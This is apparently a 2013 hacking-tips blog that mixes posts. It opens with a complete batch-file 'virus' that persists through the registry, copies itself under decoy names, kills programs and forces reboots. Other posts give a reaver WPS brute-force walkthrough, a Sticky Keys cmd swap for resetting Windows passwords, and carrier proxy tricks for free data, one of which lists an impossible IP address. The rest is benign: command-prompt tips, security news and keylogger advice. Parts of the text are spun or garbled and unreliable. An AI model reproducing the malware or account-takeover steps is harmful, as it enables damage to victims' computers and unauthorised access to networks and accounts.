Sunday, November 10, 2013

Learn How To Make A Dangerous Virus Using Notepad.

This time i am going to tell you, how to build virus on notepad.

This Virus can do:

1. Copy itself into startup
2. Copy itself over one thousand times into random spots in your computer
3. Hide its self created files
4. Task kill MSN, Norton, Windows Explorer, Limewire.
5. Swap the left mouse button with the right one
6. Opens alert boxes
7. Changes the time to 12:00 and shuts down the computer
 
 
 
 
and many more.

Now follow the steps given below

Step 1 >> Open Notepad.
Step 2 >> Copy This Code ..

Code(below line) :--

------------------------------------------------------------------------------------------------
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
-------------------------------------------------------------------------------------------------------------
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

Thursday, November 7, 2013

Hack WIFI password with Ubuntu (WPA/WPA2)

In this tutorial we are going to use a new vulnerability in WPA and WPA 2 (PSK/TKIP)Wireless passwords, this weak point is to attack WPS; Which is Wireless Protected Setup : this type of setup is built in 90% of routers to allow easy establishment of secure home wireless by the user, though it has been shown to fall to BruteForce Attacks. This BruteForce attack will try all combinations of Router’s PIN number (Provided by WPS) and access the router to reveal the password. This type of hack have many benefits such as: You can always have the Wireless Password even if It’s changed by knowing the PIN number.

How To Hack WPA/WPA2 Passwords using Ubuntu (Reaver)

Step 1 (Setting up Reaver 1.4 )

1) Open terminal and type: sudo -s and type your password.
2) Download
(Better Download the Latest Version ) Placed in a specified folder.
3) Open a Terminal and type : tar xvfz reaver-1.4.tar.gz
4) Install dependencies: sudo apt-get install libpcap-dev
then : sudo apt-get install libsqlite3-dev
Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are very important.
4) Enter the folder by typing : cd reaver-1.4/src
5) Type: ./configure
6) Type : make
7) Type : make install


To test if Reaver have been successfully installed, Open a Terminal and Type ‘reaver’ and hit enter, it should list all Reaver’s sub commands.


Step 2 ( Hacking WPA/WPA2 Wireless)

After installing reaver 1.4, it’s time to proceed to the main part which is hacking wireless passwords that uses WPA/WPA2 Encryption.
Requirements:
Install aircrack-ng by typing sudo apt-get install aircrack-ng
Airodump-ng / Airmon-ng commands
Reaver 1.4 (Install in Step 1)
1) We need to have the wireless BSSID (Mac address) so we use airodump-ng :
Open a terminal and Type : airmon-ng start wlan0
Type : airodump-ng mon0
It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:22:33:44:55 )
2) Starting the attack:
Type: reaver -i mon0 -b 00:11:22:33:44:55
Now it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack.
Note: You can use walsh -i mon0 to scan for vulnerable Access Points
Screenshot:
learn2crack.com

Thursday, October 31, 2013

How to hack Window

Method 1 of 2: Hack from the Start Screen
  1. When the computer starts up, hold down F8 before you see the "Windows Starting" screen. This will bring you to a screen with choices. Your best bet will be "Safe Mode with Command Prompt". You can then do as you want.

2. Go down to the bottom and select "All Files".
3. Name the file: Batch.bat.
4. Go to where you saved the file, and open it. This will open up Command Prompt.
5. If the computer has Notepad blocked, you can use edit. Access this by opening command prompt or command.com and typing edit. Also, you can even use Microsoft Office or something if you can save it right.
6. Do as you wish inside command prompt. Here is how to add or delete accounts:
 
             Add Account: C:>net user USERNAME /add
  • Change Accounts password: C:>net user USERNAME * then you'll be able to enter a new password for the account. If you just press enter without typing anything, the account password will be reset.
  • Delete Account: C:>net local group Administrators# # Another way is to open up notepad, (if it's not blocked), and type in "command.com". Then go to File->Save As. A USERNAME /ADD
 

EdiMethod 2 of 2: Hack from the Windows 7 CD

  1. 1
    Boot the system from the Windows 7 CD.

  2. 2
    Click on Next.

  3. 3
    Choose “Repair your computer”.

  4. 4
    Click Next in the System Recovery window.

  5. 5
    Choose the Command Prompt option below.

  6. 6
    In the command prompt window, copy the Seth file to C drive. Enter this command: “C:\windows\system32\Seth.exe c:” (without quotation marks).

  7. 7
    Replace the Seth.exe file with cmd.exe file with following command, and type “yes” to replace the file: "c:\windows\system32\cmd.exe c:\windows\syetem32\Seth.exe" (without quotation marks).

  8. 8
    Type "exit” to restart the Windows setup.

  9. 9
    Press the shift key 5 times, rapidly, when you're in the username screen. In the Sticky Keys window, click Yes.

  10. 10
    In the command prompt window type the “net user,” “user name” and “password”. For example: net user administrator 123

10 Command Prompt Tricks and Hacks

Command Prompt Tricks, Hacks, and Secrets in Windows 7, 8, Vista, and XP


The Windows Command Prompt tool, and many of its commands, might seem boring or even relatively useless at first glance, but as anyone who has ever used the Command Prompt very often can tell you, there's much to love!
Below are several Command Prompt tricks and other Command Prompt hacks that I guarantee will get you excited about many of the mundane sounding Command Prompt commands like telnet, tree, or robocopy... okay, robocopy sounds pretty cool.
Some of these Command Prompt tricks and hacks are special features or uses of the Command Prompt itself, while others are just neat or relatively unknown things you can do with certain commands. Enjoy!

1. Use Ctrl-C to Abort a Command

Ctrl-C - Command Prompt Tricks
Just about any command can be stopped in its tracks with the abort command: Ctrl-C.
If you haven't actually executed a command, you can just backspace and erase what you've typed, but if you've already executed it then you can do a Ctrl-C to stop it.
Warning: Ctrl-C isn't a magic wand and it can't undo things that aren't undoable, like a partially complete format command. However, for things like the dir command that seem to go on forever or questions you're asked at the prompt that you don't know the answer to, the abort command is an excellent Command Prompt trick to know.
 
2. View a Command's Results One Page (or Line) at a Time
More Command - Command Prompt Tricks
Ever run a command, like the dir command, that produces so much information on the screen that it's almost useless? You're not alone.
One way around this is to execute the command in a special way so whatever information is generated is shown to you one page, or one line, at a time.
To do this, just type the command, the dir command for example, and then follow it with the pipe redirection operator and then the more command.
For example, executing dir /s | more will generate the thousands of lines of results that you expect from the dir command, but the more command will pause each page of results with -- More -- at the bottom of the page, indicating that the command is not done running.
Just press the space bar to advance by page or press the Enter key to advance one line at a time.
See Command Prompt Trick #7 below for a different solution to this problem.

3. Run Command Prompt as an Administrator Automatically

Command Prompt Admin Shortcut - Command Prompt Tricks
Many commands require that you execute them from an elevated Command Prompt in Windows - in other words, execute them from a Command Prompt that's run as an administrator.
You can always right-click on any Command Prompt shortcut and choose Run as administrator but creating a shortcut to do the same thing can be a huge time saver if you're a frequent Command Prompt power user.
To complete this Command Prompt trick, just create a Command Prompt shortcut on the desktop, enter the shortcut's properties and then select the Run as administrator box located in the Advanced button on the Shortcut tab.

4. Become a Command Prompt Power User with Function Keys

Command Prompt Function Keys - Command Prompt Tricks
The fact that the function keys actually do something in the Command Prompt is maybe one of the best kept secrets about the tool:
F1: Pastes the last executed command (character by character)
F2: Pastes the last executed command (up to the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the entered character
F5: Pastes recently executed commands (does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously executed commands
F8: Pastes recently executed commands (cycles)
F9: Asks for the number of the command from the F7 list to paste
Command Prompt Trick #17 is full of arrow key shortcuts, a few of which are similar to these function key tricks.

5. Hack the Prompt Text

Prompt Command - Command Prompt Tricks
Did you know that the prompt itself in the Command Prompt is completely customizable thanks to the prompt command? It is, and when I say customizable, I mean really customizable.
Instead of C:\>, you can set the prompt to any text you want, have it include the time, the current drive, the Windows version number, you name it.
One useful example is prompt $m$p$g which will show the full path of a mapped drive in the prompt, alongside the drive letter.
You can always execute prompt alone, without options, to return it to its sometimes boring default.

6. Get Help for Any Command

Help Switch - Command Prompt Tricks
Believe it or not, the help command does not provide help for every Command Prompt command. However, any command can be suffixed with the /? option, usually called the help switch, to display detailed information about the command's syntax and often times even some examples.
I doubt that the help switch is the coolest Command Prompt trick you've ever heard of, but it's hard to disagree that it's one of the more useful.
Unfortunately, neither the help command nor the help switch offer much in the way of explaining how to interpret the syntax. See How To Read Command Syntax if you need help with that.

7. Save a Command's Output to a File

Command Output - Command Prompt Tricks
An incredibly useful Command Prompt trick is the use of redirection operators, specifically the > and >> operators.
These little characters let you redirect the output of a command to a file, giving you a saved version of whatever data the command produced in the Command Prompt window.
For example, let's say you're about to post a computer problem to an online forum and you want to provide really accurate information about your computer. An easy way to do that would be to use the systeminfo command with a redirection operator.
For example, you might execute systeminfo > c:\mycomputerinfo.txt to save the information provided by the systeminfo command to a file. You could then attach the file to your forum post.
See How To Redirect Command Output to a File for more examples and a better explanation of how to use redirection operators.

8. View Your Hard Drive's Entire Directory Structure

Directory Structure with Tree Command - Command Prompt Tricks
I think one of the neatest little commands is the tree command. With tree, you can create a kind of map of your computer's directories.
Execute tree from any directory to see the folder structure under that directory.
Tip: With so much information, it's probably a good idea to export the results of the tree command to a file. For example, tree /a > c:\treeresults.txt, just as explained in Command Prompt Trick #7.
Ads
Password Recovery Softwarewww.StellarInfo.co.inCall Stellar Data Recovery To Get Back Lost Data. Free Consultation
Photo Shop: Registerwww.Shiksha.com/Photo+Shop+TrainingFind Top Training Academy in India. Get info on Courses,Admission,Fees.

9. Customize the Command Prompt Title Bar Text

Command Prompt Title Bar - Command Prompt Tricks
Tired of that Command Prompt title bar text? No problem, just use the title command to change it to whatever you like.
For example, let's say your name is Suhan Gorya, and you want to express your ownership of the Command Prompt: execute title Property of Suhan Gorya and the Command Prompt's title bar will change immediately.
The change won't stick, so the next time you open Command Prompt the title bar will be back to normal.
The title command is usually used to help give a custom appearance in script files and batch files... not that I'm saying titling it with your name isn't a good idea!

10. Copy From the Command Prompt

Mark Feature in Command Prompt - Command Prompt Tricks
As you may or may not know, copying from the Command Prompt is not as easy as copying from other programs, which is part of the reason why saving a command's output to a file, Command Prompt Trick #7, is so handy.
But what if you do just want to copy a short section of text to the clipboard? It's not too hard but it's not very intuitive either.
Right-click anywhere in the Command Prompt window and choose Mark. Now, highlight with your left mouse button whatever you'd like to copy. Once your selection is made, press Enter.


Enjoy your choice..

Suhan Gorya

Tuesday, October 15, 2013

Hackers Head on Internet appliances

Suhan Gorya


From a command center in a non-descript high-rise here in the heart of Silicon Valley, security start-up Norse has been gathering shocking evidence of hackers usurping control of Internet-connected appliances, everything from web cams to climate-control systems.

This latest expansion of cybercrime revolves around the IP address assigned to each computing device connected to the Internet. Cybercriminals have begun capitalizing on the fact that many of the mundane digital devices we tie into the web are easy to locate and wide open to hacking.

"There's only one way onto the Internet, and that's through an IP address," says Norse CEO Sam Glines. "The adversary just wants IP space to launch attacks and doesn't really care if it's a baby monitor or a server at a Fortune 1000 company."

The bad guys are using automated programs to scan ranges of IP addresses for signs of vulnerable appliances. It's often a simple matter to take control by installing a few lines of malicious coding.
Norse has devised innovative technology for monitoring such cyberattacks in real time. A tiny sampling of its data, extracted exclusively for CyberTruth, revealed 724 infected appliances actively carrying out fraudulent tasks.
The corrupted appliances included firewalls, routers, modems, printers, DVRs, surveillance cams, web cams, IP cameras, VPN appliances, VOIP phone systems, FM radio transmitters, storage drives, video conferencing systems and climate-control modules. One of the big things these corrupted devices are being used for: payment card fraud.
"We are seeing credit card transactions from baby monitors, DVRs, TVs, printers, medical devices, you name it," says Tommy Stiansen, Norse founder and chief technology officer. "It's coming from all types of industries and from homes."
In a stunning demonstration, Stiansen clicked to the IP address for an activated ABS MegaCam, widely sold as a $220 baby monitor. The device was activated on the Internet by a resident of Glendale, Calif., who uses Charter Communications as an ISP.
Malicious software embedded on the web cam's Linux operating system causes a live cam view of the homeowner's living room to appear in the browser of anyone who clicks to the web cam's IP address. During Stiansen's demo, a woman and then a man enter the room and sit on a couch.
The bad guy who embedded the malware on the baby monitor probably doesn't care much about snooping; the web cam's computing power, instead, is being used to locate similar devices and help the attacker to control as many as 2,000 ABS MegaCams.
"This is happening at a large scale, and it's growing hugely every day," Stiansen says, "This is very powerful stuff, and the scariest part is this is only the tip of the iceberg."
There's clear logic behind methodically assembling digital appliances into niche networks, called botnets, under the control of a single operator.
Botnets have been the foundation of the cyber underground for more than a decade. Traditionally comprising infected personal and server computers, botnets are the engine that drives multibillion-dollar markets for spam, phishing, account hijacking, identity theft and denial-of-service attacks.
Norse's findings show how the advance guard of cybercriminals has begun pulling digital appliances into botnet service because, at the moment, it's easy to do so.

Norse notifies proper entities about problems. However, sheer numbers of issues make it impossible to notify everyone, says Glines. The company is working on processes to extend notifications. For the moment, there is no broad-based effort at defense, beyond what individual organizations are doing to protect themselves.
The Internet of Things has proved trivial to hack as the U.S. tech industry puts new consumer technologies on a fast track to store shelves, sometimes with meager quality control or accounting for security and privacy.
That trait is coming to the fore as the tech giants race to profit from the rising popularity of mobile devices and Internet-delivered services. Meanwhile, the cyber underground continues to mature into a smooth-running global industry that's quick to pounce on fresh opportunities.
"Competitive struggles force manufacturers into early release cycles, networks are becoming increasingly complex, and the complexity is hard to overcome," Stiansen says. "Meanwhile, hackers use social crowds to build hacker communities that allow them to move under the radar."
Stiansen grew up tinkering with computers on a Norwegian farm, which led him to a career designing air-traffic control and telecom-billing systems. After immigrating to the U.S. in 2004, Stiansen began thinking about a way to gain a real-time, bird's-eye view of the teeming world of botnet activity.
What he eventually came up with is IPViking, a globe-spanning network of millions of physical and virtual sensors — or honeypots — dispersed through 160 data centers in 40 countries. Each pot appears to be an Internet-connected web cam, router or other appliance — irresistible honey to hackers.
When an intruder tries to take control of a Norse honeypot, Norse grabs the attacker's IP address and begins an intensive counterintelligence routine. The IP address is fed into automated programs, called web crawlers, that scour the bulletin boards and chat rooms where hackers congregate for snippets of discussions tied to that IP address.
Analysts also do manual research to construct a dossier on the attacking IP. Norse delivers this intelligence to its clients, which include large financial institutions. The companies are then able to cut off communications from suspicious IP addresses and be on the lookout for derivative attacks.

US Government shutdown raises cybersecurity concerns

Suhan Gorya :
"shutdown clear the way to down network for all the secure work"

A new CyberTruth –SurveyMonkey Audience poll has found that Americans' concerns about the nation's cybersecurity are heightened with the government shutdown.
Some 62% of 538 respondents said they felt some degree of heightened concern, while 54% of survey takers indicated feeling some degree less secure with the government shutdown.
There have been plenty of headline- grabbing disclosures over the past two years of politically- motivated hackers disrupting banks and media companies and stealing data that relates to critical infrastructure.
"Citizens are right to be concerned with our nation's cyber defensive capabilities during the shutdown," says Chris Petersen, CTO and co-founder of LogRhythm, a security analytics company in Colorado. "Defending against these attacks requires highly skilled people, and many of these people are sidelined. Their posts are going unmanned and the defensive positions held are being eroded."
Survey takers were asked to select which issue about the government shutdown concerned them most. The top choice: the "potential for the government to default on its debt," cited by 26%of respondents, followed by "Congress not carrying out its daily duties," 25%; "furloughed workers not getting paid," 20%; "security threats from other entities," 12%; and "national parks and monuments being closed,: 8%.
"It is hard to predict the exact consequence the government shutdown will have when it comes to defending our nation's virtual borders," says Peterson. "Many posts are undermanned, and our defenses are down. With fewer eyes on their activities, attackers can more aggressively infiltrate further into networks, systems, and data, better able to hide their tracks in the process."
Peterson predicts that cyberspies are likely to probe and penetrate poorly monitored systems. "New beachheads will be established," he says. "Some will be used for immediate gains. Over time, some of these compromises will be detected when furloughed cyber security workers return to their posts. However, other beachheads will stay intentionally hidden, buried and dormant, waiting for the right time to strike."

Download Temple Run Game For Window PC Free.

Suhan Gorya
 
Android platform is the best platform to play games.There are lot of android games are available on internet like Arcade games,Puzzle games,Shooting games,Adventures etc.But the bad thing in these games is that,We are unable to play these games on PC.But Tricks For You always try to search these games for PC also.
And in today's article we will provide you the trick to download Temple Run Game For PC.This game is installed on PC using Bluestacks app player.

How To Download Temple Run Game For PC:

Step 1:Download the Bluestacks app player for windows From Here.
Note:The optimized version of Bluestacks is available for Windows 8 and if you are a Window 8 user then go for it else just download the bluestacks beta version.
Step 2:After downloading bluestacks app player install it on the PC.The installation takes some time as the app player fetch all the android supporting files from the web.
Step 3:Now download Temple Run from android store
 
Step 4:The download file is of .apk extension.Run the setup by using Blueslack app player and enjot the game for free.

Free Internet With BSNL, AIRTEL, VODDAFONE And IDEA: Follow Suhan Gorya

Suhan Gorya

 
Free things are loved by everyone and all of us want to grab these free things instantly. Similarly if you can enjoy free internet with simple tricks then why not to get it. Just follow some steps and enjoy this opportunity. In this post I am mentioning that how you can enjoy free internet on BSNL, AIRTEL, VODAFONE and IDEA.
BSNL:



This is the new FREE BSNL 3G Trick for brand spanking new Year 2013, Trick supported the proxies and free yahoo Home Page as you all understand BSNL is that the first ever Indian telecommunication to supply the 3G Services that too comprising with the most cost effective rate, BSNL has currently augmented the speed of the info Plans and is cost accounting quite they aforementioned. Currently it’s time to tweak their ports and gets what we have a tendency to demand for. Currently a day’s BSNL is providing free Yahoo Homepage services. It’s gap freely in some series and a few States. This Trick is sort of acting at high speed. And in BSNL simply chuck the speed capping. There's no limitation of the speed and capping.

Features of new BSNL free 3G trick:

  • No speed capping
  • Disconnection clause has been removed
  • No have to be compelled to setup the VPN
  • Proxy based mostly trick
  • No want of the external Account
  • Communications protocols and HTTP protocols area unit supported
  • Resume and Parallel downloading
How to setup BSNL free 3GtTrick:

For Mobile Users:
  • Make a new Configuration Settings on your Phone/Tablet
  • Account name: MYIDEAIDEA
  • Access Point: Celloneportal
  • Proxy: 192.168.87.163
  • Port: 8080
  • Home Page: wap.yahoo.com
That’s it!. Now you have to save these settings and connect with the specified home page. You can easily browse and download from High Speed BSNL 3G Networks.
For PC Users: 
  • If you are using 3G Data card then Create a New Profile for using this Trick.
  • Profile Name: Myideaidea
  • Use APN (Access Point Name) as: Celloneportal
  • Now save your new settings and navigate to Firefox browser or Google Chrome for enjoy easy configuration. Here you have to set proxy as 192.168.87.163 and PORT as 80.
  • Setup Home Page as: wap.yahoo.com
Airtel:



We all apprehend Airtel is incredibly strict currently days and that they have blocked most of the tricks that were operating within the past. Airtel is additionally obstruction SIM card of its users for mistreatment free net if they overuse the information measure. Most of the VPN and proxy tricks have stopped operating in most of the regions. However still we tend to managed to search out few operating tricks. This is often a proxy trick that's reportedly operating in geographical area and urban center and tested in person by the Author in 2G and 3G network. The proxy trick is shared by our on-line Reader Jay. The Airtel 2G/3G Proxy Trick appears to be operating in geographical area and urban center, but it'll even be operating in UP east and alternative states together with Rajasthan and Gujarat. 

Features of this trick:-

  • This is often a proxy trick like alternative VPN tricks you wish to not transfer or install any package and you furthermore might needn't to try and do any configuration settings.
  • As I discussed higher than that it’s a proxy trick, it'll work unflawed all told those states wherever proxy tricks square measure still operating.
  • This trick is tested and located operating in urban center and geographical area on each 2G and 3G networks therefore if Airtel 3G isn't launched in your region you'll use it on 2G network. For mistreatment it on 3G network
  • Activate 3G zero rentals set up otherwise you may not get 3G speed.
  • You can use this trick on your laptop moreover as on Phone. This trick is functioning fine on Default browsers of the phone.
  • No SIM card blocks issue. As I told you higher than Airtel block SIM card providing you exceed the information measure by ceaselessly transfer. To avoid SIM card block you wish to disconnect it once each 50MB, this is often suggested I never got my SIM card blocked mistreatment like this. Just in case your SIM card got blocked, doesn’t worry purchase the tiniest GPRS recharge in your region, in geographical area its Rs.5 for five0MB for 2G networks? Use it and look ahead to another day, your SIM card are active once more for mistreatment free GPRS tricks.
  • This trick is functioning fine with net transfer Manager aka IDM, therefore you'll transfer you files on fast speeds. To use this trick on IDM you wish to assemble IDM to use proxy. Use the subsequent technique to assemble IDM to use proxies for downloading: 1st of all double click on the IDM icon in your system receptacle. IDM window are pop-up on the screen then click on the Downloads menu from the menu bar, then click on the choices sub menu. Currently click on the Proxy tab, click on “Use hypertext transfer protocol proxy” currently write the Proxy informatics and port that is given below. Click ok and you're done.
How to setup Airtel free trick:
For mobile users:
  • Account Name: Airteltrickz.com 
  • Access point: Airtelgprs.com 
  • Proxy: enabled
  • IP: 85.17.141.35 (For Punjab and Delhi users 202.46.201.112 or 203.115.112.5 respectively)
  • Port: 80
  • Homepage: Any working IP in your state.
For PC Users:  
  • For using the trick on your system you need to configure you Browser to use proxy IP.
  • First of all Click on Tools menu from the menu bar. 
  • Click on the options sub menu 
  • Click on the Advance menu
  • Jump to Network tab and then hit settings
  • Just write the Proxy IP and Port which is given above and click on use it for all protocols. 
  • You are done with the configurations. Now open the homepage and enjoy free internet.
VODAFONE:




I will a Sharing a blasting trick of the corporate Vodafone to browse free Vodafone 2G and 3G net free for lifespan. Simply follow the given steps to use this trick and revel in. Go to your configuration setting of internet in your mobile or in data card. Now just configure the following settings in it:-
  • Account Name:- Vodafone
  • Apn:- portalnmms
  • Proxy:- 10.10.1.100
  • Port:- 9401 Or 8799
  • Home Page:- live.vodafone.in 
Now save these tricks and restart your system to browse your free internet.
IDEA:

You'll simply use free GPRS on plan .This trick is confirmed operating in many nations together with the NCT city. During this trick you'll use free web by Opera mini. Operators are strict concerning the victimization of free web. Before tricks you have to follow some points. They are:- 
  • Don’t transfer more than 200 MB
  • Activate 3G in your mobile if it's not activated. (for this Send ACT 3G to 12345)
  • Steps for configuring free internet
  • Transfer Opera mini with host support which may add each humanoid and Nokia
Now produce a manual setting in your phone/browser as given below:
  • Account Name: Idea
  • Home Page: http://www.google.com
  • Port: 8080
  • Proxy Address:  453.28.98.00
  • Access Point:  internet
 

Rapidshare Hack

Suhan Gorya

1) (For Firefox Users) :-
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.


http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
2) Restart Firefox
3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html
4) Right click on rapidshare.user.js and choose "Install User Script".
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active.
7) Click on it to install this plug-in then CLOSE FIREFOX.
8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'.
9) Open it.
10) Click the Tools Menu then click on Install User Script then click OK.
11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!


2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

A] Short-Out the JavaScript:
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this-    javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

B] Request a new IP address from your ISP server:
Here\92s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it \93RapidShare No Wait\94
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait


Facebook Hack – View photo albums of non-friends

A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.
Facebook Photo Exploit
By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online.
- See more at: http://blog.insecure.in/?p=699#sthash.8MP0fbzu.dpuf

Facebook Hack – View photo albums of non-friends

A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.
Facebook Photo Exploit
By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online.
- See more at: http://blog.insecure.in/?p=699#sthash.8MP0fbzu.dpuf

Facebook Hack – View photo albums of non-friends

A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.
Facebook Photo Exploit
By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online.
- See more at: http://blog.insecure.in/?p=699#sthash.8MP0fbzu.dpuf

How to secure your system from Keyloggers

Suhan Gorya





Now a days keylogger is major problem for all.  So we should learn to secure our computer from keylogger.    This article will help for ethical hackers or who want to protect their pc.


What is Keylogger?


Keylogger is one of spyware which will what type you through the keyboard and send it to hacker who send the keylogger. Hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data.  So whenever you type the username and password in gmail,online banking sites, it will send the username and password to hacker. 







How to Protect?



In order to provide security for your system,you must have


Good AntiVirus:
This is basic and best step to protect your system from keylogger.  So buy a licensed and best antivirus which is currently in market.  My suggestion is Kaspersky, Norton or Mcafee.  Don't forget to update regularly.
Note: Don't use trial or cracked pack ,it is worthless to use.

Good Spyware:
Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.




Antilogger can be Handy

Antiloggers are programs that detect the presence of keyloggers on a given computer. Zemana Antilogger is the best antilogger.

Online Scanning

When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines are involved in the scanning process.

Keyscrambler

Keyscrambler is one of the best protection against keyloggers that you can have, Keyscrambler is a small program which encrypts your typed keystrokes so even if the victim has installed a keylogger on your system, he or she will get encrypted keys. Keyscrambler currently supports Firefox, Internet explorer and other applications, however its premium version supports more than 160 applications

Download Files directly to your web host server faster and easier

Suhan Gorya

Needless to say that it’s a hectic job to download and upload a file from some website  to your hard drive and again upload and extract it to your server. Imagine how much time are you loosing in this process. But imagine how you can save your time by directly downloading it to your own web server. While your web server always have larger download speed as compared to your home/office PC.
There are several ways to access the terminal of your web server/host. But we are focusing on SSH (Secure Shell) method. Secure Shell is one of the alternative of telnet terminal. Secure shell is itself a secured access terminal. To acces and use SSH terminal your web host must have to enable it.
If you own a dedicated or VPS or any private server then you can easily configure it on or off by yourself. If you don’t own a dedicated server or you’ve used a shared server then usually they are turned off for security reasons, you must request your web host support team.
Another thing necessary to accomplish this process is, a SSH client. Without a client it won’t be easy to access SSH server. Since most of us use Windows, you can use PuTTy.
Login to your web server using your regular control access data.
a Download Files directly to your web host server faster and easier
Once you click on Open button you’ll be redirected to a terminal window which asks you login details.
b1 Download Files directly to your web host server faster and easier
Once successfully logged in change and locate the directory you want to download your file to. For example, in this tutorial, you’ll be downloading a file to public_html.
c1 Download Files directly to your web host server faster and easier
Now finally use the wget command to download files.
For example, if you want to download a file located in http://www.website.com/xyz.zip execute the following command in SSH terminal.
wget http://www.website.com/xyz.zip
d1 Download Files directly to your web host server faster and easier
That’s it, you are all done.
Using this method will help you to reduce the excessive bandwidth usage because of repeated downloading and uploading same file. Besides these there are several benefit of using SSH to download files directly to your server.

Removing Autorun.inf/Autorun.ini virus manually

Suhan Gorya


I want you to apply several methods to remove the autorun.inf or autorun.ini virus.

METHOD I
You can easily remove the VB script viruses like MS32DLL.dll.vbs and others which works with the aid of autorun.inf in your harddrive. This virus is mostly transferred via USB pendrive which don’t have any write protect function.
Although i recommend you to use a good virus removal software or script blocker. When you open any of the hard drives may be USB or primary hard disk. You will be directed to this visual basic script which drives yourcomputer crazy. It becomes hard to access your harddrive.
Here’s a way how to disable this script atleast.
As it works with the help of autorun.inf you must be aware to find the autorun.inf file in your hard drive which is read-only and hidden.
NOTE: Remember this script also blocks some of the contents in Folder options . For example, “show the hidden files“.



So DOS, which is the best way for hackers as well as repairers to edit your computer.
Do the following.
STEP 1:
Locate the infected drive either C:, D:, E:, F, and so on.
STEP 2:
Now search for the file name autorun.inf using dir command.
” C:/dir autorun.inf (where C, is your drive)”
STEP 3:
I know that, it won’t discover any of the file name autorun.inf as it is the hidden one. Try the following:
” C:/dir/ah (where C is ur drive letter)
Now you can see the files autorun.inf of approx 100+ Kb and MS32DLL.dll.vbs file.
STEP 4:
Autorun.inf is the Master and MS32DLL.dll.vbs is a worker. Autorun.inf gives order to work out on the computer. So first you must delete the file named autorun.inf try these codes.
“C:/del/ah/f autorun.inf”
I think the file is now deleted
STEP 5:
Now type following commands:
“C:/copy con autorun.inf (Enter)
[AutoRun]
open=explorer.exep(Press F6 button and hit enter)
Now you are approx. done.
Now do the same steps for MS32DLL.dll.vbs file as i mentioned in STEP 4
Try to restart the computer
You’ll see the result, if not worked better you use a better virus removable and be prepared for future. If you want to remove this virus first download your usb drives and ur hard drives. Don’t keep any backup.
AND HEY DON’T forget about the program wscript.exe check if it is running or not in you taskmanager. It makes the vbs file work.


